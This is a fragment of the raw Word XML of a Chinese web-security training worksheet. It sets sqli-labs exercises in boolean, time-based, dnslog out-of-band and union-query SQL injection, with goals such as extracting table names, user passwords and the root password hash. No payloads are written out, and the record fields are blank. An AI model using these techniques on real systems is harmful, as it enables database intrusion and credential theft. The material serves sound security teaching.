              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>的盲注</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3396" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3395" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3398" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3397" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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学员能够掌握基于布尔的</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>盲注方式</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C339A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3399" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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lastRenderedPageBreak/>
              <w:t>实操步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C33A0" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C339B" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:num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目标链接</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>http://ip/sqli-labs/Less-8/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C339C" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:num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对目标链接进行测试，测试逻辑“真”，查看页面返回数据</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C339D" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:num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对目标链接进行测试，测试逻辑“假”，查看页面返回数据</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C339E" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:num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判断目标链接是否存在漏洞</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C339F" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:num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测试目标数据库名的长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C33A2" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C33A1" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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实操过程记录及截图（需要记录漏洞利用参数、操作命令）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C33A9" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C33A3" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C33A4" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C33A5" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C33A6" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C33A7" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C33A8" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="059C33AA" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5"/>
    <w:p w14:paraId="059C33AB" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc3248"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基于时间的盲注</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C33AD" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C33AC" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操题目</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C33AF" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C33AE" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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基于时间</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>的盲注</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C33B1" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C33B0" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C33B3" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C33B2" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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学员能够掌握基于时间的</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>盲注方式</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C33B5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C33B4" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C33B9" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C33B6" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:num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目标链接</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>ip</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/sqli-labs/Less-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C33B7" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:num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对目标链接进行测试，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>加入时间延迟语句，验证目标链接是否存在漏洞</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C33B8" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:num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基于时间盲注，测试目标数据库名的长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C33BB" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C33BA" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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实操过程记录及截图（需要记录漏洞利用参数、操作命令）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C33C2" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C33BC" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C33BD" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C33BE" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C33BF" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C33C0" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C33C1" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="059C33C3" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5"/>
    <w:p w14:paraId="059C33C4" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc16082"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基于</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dnslog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的盲注</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C33C6" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C33C5" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操题目</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C33C8" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C33C7" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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基于</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>dnslog</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>的盲注</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C33CA" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C33C9" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C33CC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C33CB" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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学员能够掌握基于</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>dnslog</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>盲注方式</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C33CE" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C33CD" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C33D4" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C33CF" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:num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目标链接</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>http://127.0.0.1/Less-1/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>windows</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>环境）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C33D0" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:num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访问</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>http://dnslog.cn</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>获取一个子域</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C33D1" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:num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对目标链接进行测试，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>基于</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>dnslog</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>方式，获取当前数据库名称</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C33D2" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:num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基于</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>dnslog</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>方式，获取</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>security.users</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>表中的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>stupid</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>用户密码</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C33D3" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:num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基于</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>dnslog</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>方式，获取</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>security</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>数据库所有的表名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C33D6" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C33D5" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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实操过程记录及截图（需要记录漏洞利用参数、操作命令）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C33DD" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C33D7" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C33D8" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C33D9" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C33DA" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C33DB" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C33DC" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="059C33DE" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5"/>
    <w:p w14:paraId="059C33DF" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc3855"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>联合查询注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7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8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C33E1" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C33E0" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操题目</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C33E3" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C33E2" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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联合查询注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C33E5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C33E4" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C33E7" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C33E6" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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学员能够掌握联合查询的注入方式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C33E9" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C33E8" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C33EC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C33EA" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:num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目</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>标链接</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>http://ip/sqli-labs/Less-1/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C33EB" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:num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通过联合查询，获取数据库</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>root</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>用户的密码</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>hash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>（必须</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>root</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>用户，不需要解密成明文）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C33EE" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C33ED" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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实操过程记录及截图（需要记录漏洞利用参数、操作命令）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C33F5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C33EF" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
